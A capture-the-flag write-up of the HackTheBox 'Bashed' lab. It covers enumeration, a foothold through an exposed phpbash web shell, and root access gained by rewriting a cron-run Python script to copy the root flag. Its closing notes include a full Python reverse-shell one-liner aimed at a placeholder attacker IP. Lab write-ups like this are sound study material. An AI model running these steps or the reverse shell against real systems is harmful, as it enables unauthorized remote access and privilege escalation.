---
title: "Bashed HTB"
date: 2021-08-20T17:30:30
categories:
  - study
tags:
- Linux
- File Misconfiguration
classes: wide
---
Bashed is an easy rated box released in 2017 on HackTheBox. HTB's writeup synopsis is:

>*"Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As 
basic access to the crontab is restricted"*

Find it [here.][htbboxlink]

[htbboxlink]: https://app.hackthebox.eu/machines/Bashed

<h2> Enumeration</h2>
**Nmap scan results:**

```
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
```

<h4>What is the scan telling us?</h4>

- Port 80 is open running Apache 2.4.18 on Ubuntu.
- It is the only open port, meaning everything must be done web based.
- We see a user named Arrexel.

**Gobuster:**
```
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
```
Navigating to the website we see reference to phpbash developed by Arrexel, according to the [github page](https://github.com/Arrexel/phpbash) it is:

>*"a standalone, semi-interactive web shell. It's main purpose is to assist in penetration tests where traditional reverse shells are not possible. The design is based on the default Kali Linux terminal colors, so pentesters should feel right at home."*

The github page states that it requires shell_exec php function to be enabled, and it can be found on /phpbash.php.


<h2>Foothold</h2>

We look around at the gobuster results and when we navigate to /dev/ we see an index of /dev/ and we see a *phpbash.php* file. We click on it to navigate to /dev/phpbash.php and we see a web shell where we are www-data, from here we navigate to Arrexel's home directory and find the user flag.

```
www-data@bashed
:/home/arrexel# ls

user.txt
```

<h2>Privilege Escalation</h2>

Running `sudo -l` we see:
```
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
```
that www-data can run commands as the user scriptmanager which has nopasswd ALL. In the # directory we see that there is an unusual folder called scripts owned by script manager. www-data has no perms to view the contents. But we can use `sudo -u scriptmanager chmod 777 -R scripts` to modify our www-data permission as scriptmanager to allow us to cd into the directory. We now have a look inside:

```
www-data@bashed
:/scripts# ls -alh

total 16K
drwxrwxrwx 2 scriptmanager scriptmanager 4.0K Dec 4 2017 .
drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
-rwxrwxrwx 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Sep 21 09:23 test.txt
```

Inside we see 2 files, test.txt and test.py, inside the test.txt file we see the contents: testing 123! This file is also only writeable by root.

`cat test.py` we see the following contents: 

```python
f = open("test.txt", "w")
f.write("testing 123!")
f.close
```

It seems that test.py writes to text.txt, and it must do this as a cron job as only root has read/write on test.txt. From here we can replace the contents of test.py to write the contents of `/root/root.txt` to a file in this directory called `root1.txt`.

```bash
www-data@bashed
:/scripts# echo "import os" > test.py

www-data@bashed
:/scripts# cat test.py

import os
www-data@bashed
:/scripts# echo "os.system('cat /root/root.txt > root1.txt')" >> test.py

www-data@bashed
:/scripts# cat test.py

import os
os.system('cat /root/root.txt > root1.txt')
```

> Python sidenote: import OS lets us use os.system to *execute the command (a string) in a subshell.*


Wait for 1 minute and we obtain the root flag!

```bash
www-data@bashed
:/scripts# ls

root1.txt
test.py
test.txt
www-data@bashed
:/scripts# cat root1.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```

<h4>For next time:</h4>

- Understand chmod permissions more, and the concept of being able to execute commands as another user from another user.
- See if there are any weird directories in the home directory.
- When echoing something into a file, > means everything in the file will be deleted. >> means contents will be appended to the end of the file.
- Make sure to not use multiple pairs of double quote marks, it confuses the entire thing. 
- It is possible to setup a python reverse shell `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOURIP",YOURPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`and catch it in NC listener. If I did this I could have ran `sudo -u scriptmanager /bin/bash` to bypass the need to `ls` and `chmod` by just opening a scriptmanager shell. 
